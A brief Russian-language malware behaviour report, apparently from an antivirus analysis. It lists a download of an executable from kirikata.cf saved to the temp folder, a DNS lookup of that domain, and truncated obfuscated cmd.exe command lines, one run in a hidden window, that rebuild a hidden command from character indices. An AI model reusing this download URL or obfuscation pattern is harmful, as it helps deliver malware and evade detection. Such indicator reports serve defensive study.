Техническая информация
- http://kirikata.cf/eshi.exe как %temp + %\he.exe
- '<SYSTEM32>\cmd.exe' \v:ON \c"set trance= && set auckland=7xi%XU9aFL4_)JH1ed=m5W$\Vt;2(S0TGNo@Kz8cIMwjgyr.un3\ YCk~:Oflq-PEDB6,bZQ+'RpshvA && for %H in (75,34,42,16,46,76,77,16,60,60,47,16,1,16,52,62,42,52,77,2,17,...
- DNS ASK ki##kata.cf
- '<SYSTEM32>\cmd.exe' \v:ON \c"set trance= && set auckland=7xi%XU9aFL4_)JH1ed=m5W$\Vt;2(S0TGNo@Kz8cIMwjgyr.un3\ YCk~:Oflq-PEDB6,bZQ+'RpshvA && for %H in (75,34,42,16,46,76,77,16,60,60,47,16,1,16,52,62,42,52,77,2,17,... (со скрытым окном)